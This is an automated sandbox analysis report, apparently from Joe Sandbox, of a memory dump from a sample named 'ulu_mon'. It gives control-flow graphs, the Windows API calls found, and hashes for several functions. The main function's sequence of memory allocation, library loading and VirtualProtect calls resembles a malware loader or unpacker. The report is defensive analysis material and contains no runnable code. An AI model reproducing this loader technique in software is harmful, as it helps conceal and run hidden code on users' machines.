                                                                                              control_flow_graph 13 528a99-528fb9 call 5284e9 call 527a49 * 2 call 527909 * 18 call 528319 call 527569 call 527889 call 527909 * 8 call 528319 call 5274f9 call 527889 call 527909 * 3 call 528379 93 528fbb-528fc2 13->93 94 528fe9-52912f call 527909 * 3 call 5275e9 call 527c59 call 527909 call 528579 13->94 95 528fcd-528fd1 93->95 115 529131-529135 94->115 116 529137-529142 94->116 95->94 96 528fd3-528fe7 call 5280d9 95->96 96->95 117 529148-5291a6 115->117 116->117 118 529144 116->118 119 5291a8-5291ef call 528729 117->119 120 5291fc-529202 117->120 118->117 125 5291f4-5291f7 119->125 122 529234-52926f call 528319 call 527c09 120->122 123 529204-52922f call 5276f9 120->123 136 529279-52927f 122->136 128 5294c9-5294dd 123->128 125->128 131 529524-529530 128->131 132 5294df-52951b call 526ee9 128->132 135 529533-529556 call 527ba9 131->135 141 529522 132->141 142 52951d 132->142 146 529567-5296e3 call 5277f9 call 528319 call 527e09 call 5281f9 call 527889 call 528a69 call 528319 call 527c09 VirtualProtect call 527c09 VirtualProtect 135->146 147 529558-529561 135->147 139 529281-5292ac 136->139 140 5292ae-5292c5 call 528319 136->140 139->136 150 5292cc-5292d7 140->150 141->135 144 5296ed-5296f0 142->144 199 5296ea 146->199 147->146 153 5292f8-52935b call 527639 call 5279c9 call 5273f9 150->153 154 5292d9-5292f6 150->154 167 529361-529375 call 528319 153->167 168 529499-52949f 153->168 154->150 177 52937f-529386 167->177 168->128 172 5294a1-5294c2 call 526ce9 168->172 172->128 179 5294c4 172->179 180 529473-529496 call 527409 177->180 181 52938c-5293b3 call 527419 177->181 179->144 180->168 189 5293d5-5293fa call 527039 181->189 190 5293b5-5293d3 call 5280d9 181->190 197 5293fe-529409 189->197 198 5293fc 189->198 190->177 200 52940b-529427 call 5278c9 197->200 201 52946e 197->201 198->177 199->144 204 529431-52946a call 528859 200->204 205 529429-52942d 200->205 201->177 204->201 208 52946c 204->208 205->180 208->180 208->201
                                                                                              APIs
                                                                                                • Part of subcall function 00528319: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 00528349
                                                                                                • Part of subcall function 00527889: LoadLibraryW.KERNELBASE(?), ref: 005278BA
                                                                                              • VirtualProtect.KERNELBASE(?,00000000,?,00000000), ref: 0052966E
                                                                                              • VirtualProtect.KERNELBASE(?,00000000,00000000,00000000), ref: 005296A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000002F.00000002.3155031336.0000000000526000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00526000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_47_2_526000_ulu_mon.jbxd
                                                                                              Similarity
                                                                                              • API ID: ProtectVirtual$AllocGlobalLibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 2510009449-0
                                                                                              • Opcode ID: fc275671c2e583b1efe37daa3226513e6a42d11b7222a547ca7e2d980d580fb5
                                                                                              • Instruction ID: 1e96384a9c8f6cb0b8ccf6da8557a3ac1c0fc7a584310ce5596155bd414c119b
                                                                                              • Opcode Fuzzy Hash: fc275671c2e583b1efe37daa3226513e6a42d11b7222a547ca7e2d980d580fb5
                                                                                              • Instruction Fuzzy Hash: C792B6B5E00219EFCB14DB98D995EEEBBB5BF8D300F148199E509A7341E631AE41CF90
                                                                                              Function 00528249 Relevance: 3.0, APIs: 2, Instructions: 50fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 209 528249-528274 CreateFileW 210 528276-528278 209->210 211 52827a-52829d WriteFile 209->211 212 5282bd-5282c0 210->212 213 5282af-5282bb 211->213 214 52829f-5282ad 211->214 213->212 214->212
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0052826B
                                                                                              • WriteFile.KERNELBASE(000000FF,00000000,?,00000000,00000000), ref: 00528299
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000002F.00000002.3155031336.0000000000526000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00526000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_47_2_526000_ulu_mon.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CreateWrite
                                                                                              • String ID:
                                                                                              • API String ID: 2263783195-0
                                                                                              • Opcode ID: 25e051ee84f5a1836dda3222278f4334694447e0a98cf775cf13d888adafe703
                                                                                              • Instruction ID: 3cc1b8a7d1dcfd1b68c721339a14c4bc5dcc88a9e2cdcf179ea72b5727656a74
                                                                                              • Opcode Fuzzy Hash: 25e051ee84f5a1836dda3222278f4334694447e0a98cf775cf13d888adafe703
                                                                                              • Instruction Fuzzy Hash: 6A012D75600508FBCB10DE98DD41FAAB7B9AF89314F208194FA189B2D0DA31EE02DB90
                                                                                              Function 00527889 Relevance: 1.5, APIs: 1, Instructions: 25libraryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 250 527889-5278c5 call 528319 call 527e59 LoadLibraryW
                                                                                              APIs
                                                                                                • Part of subcall function 00528319: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 00528349
                                                                                              • LoadLibraryW.KERNELBASE(?), ref: 005278BA
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000002F.00000002.3155031336.0000000000526000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00526000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_47_2_526000_ulu_mon.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocGlobalLibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 3361179946-0
                                                                                              • Opcode ID: 1feaf0e274cf16ef0741fa9d108665e6c366966b39e006d739153cc267d6f199
                                                                                              • Instruction ID: a814fbdc80f01323a7b5ced241a02a82c043ff7baf718830e5bcfcc30ebdbc5a
                                                                                              • Opcode Fuzzy Hash: 1feaf0e274cf16ef0741fa9d108665e6c366966b39e006d739153cc267d6f199
                                                                                              • Instruction Fuzzy Hash: FAE0ED75E0020CBBCB40EFA8DD82A9D7BB8AF99701F508194FD0897340E631AE118BA1
                                                                                              Function 005298A9 Relevance: 1.5, APIs: 1, Instructions: 204COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 255 5298a9-5298f7 call 527d89 260 529900-529938 255->260 261 5298f9-5298fb 255->261 265 52993a-529948 260->265 266 52994d-529979 malloc 260->266 262 529adc-529adf 261->262 265->262 267 529984-52998a 266->267 269 529a0a-529a0e 267->269 270 52998c-529993 267->270 272 529a32-529a49 call 528979 269->272 273 529a10-529a2d 269->273 271 52999e-5299a4 270->271 275 5299a6-5299c0 271->275 276 529a05 271->276 280 529a6a-529a96 272->280 281 529a4b-529a68 272->281 273->262 282 5299c5-529a03 call 529719 275->282 276->267 285 529aa1-529aa9 280->285 281->262 282->271 288 529aab-529acc 285->288 289 529ace-529ad5 285->289 288->285 292 529ada 289->292 292->262
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000002F.00000002.3155031336.0000000000526000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00526000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_47_2_526000_ulu_mon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dbb50fb56afd143785edb8b3f824610f8feaaf99d530fe6b5dcc6f423fa21a8f
                                                                                              • Instruction ID: 476cfc07936c08fcc356a88f4ac1f0d78005aeb94c8ee2ac7ca3b4058a8ed236
                                                                                              • Opcode Fuzzy Hash: dbb50fb56afd143785edb8b3f824610f8feaaf99d530fe6b5dcc6f423fa21a8f
                                                                                              • Instruction Fuzzy Hash: 5D91EA75D04219EFCF08CF98D880AEEBBB5BF89310F148558E519AB391D734AA41CFA0
                                                                                              Function 00528319 Relevance: 1.3, APIs: 1, Instructions: 23memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 317 528319-528327 318 528335-52834e GlobalAlloc 317->318 319 528329-528332 317->319 319->318
                                                                                              APIs
                                                                                              • GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 00528349
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000002F.00000002.3155031336.0000000000526000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00526000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_47_2_526000_ulu_mon.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocGlobal
                                                                                              • String ID:
                                                                                              • API String ID: 3761449716-0
                                                                                              • Opcode ID: 9e5e02ec3ae36198606aa10b822d832cfef97aae54456fdc6b76e3fc24730506
                                                                                              • Instruction ID: 77b8c313cc9d91969edecb637728e5c815c9ed18ed8696dea40afe3a432f55fd
                                                                                              • Opcode Fuzzy Hash: 9e5e02ec3ae36198606aa10b822d832cfef97aae54456fdc6b76e3fc24730506
                                                                                              • Instruction Fuzzy Hash: D3F04579615208EFCB48DF98D580959B7B5FB4D360F10C299FC198B341D631EE81DB94

                                                                                              Non-executed Functions

                                                                                              Function 00528A49 Relevance: 1.3, Strings: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000002F.00000002.3155031336.0000000000526000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00526000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_47_2_526000_ulu_mon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: izR
                                                                                              • API String ID: 0-3908208665
                                                                                              • Opcode ID: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
                                                                                              • Instruction ID: 3aed54436f5767a83b01f55326dea564c088d466d319321e9a1229c6b183aa19
                                                                                              • Opcode Fuzzy Hash: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
                                                                                              • Instruction Fuzzy Hash: DCC04C7595664CEBC711CB89D541A59B7FCE709650F100195EC0893700D5356E109595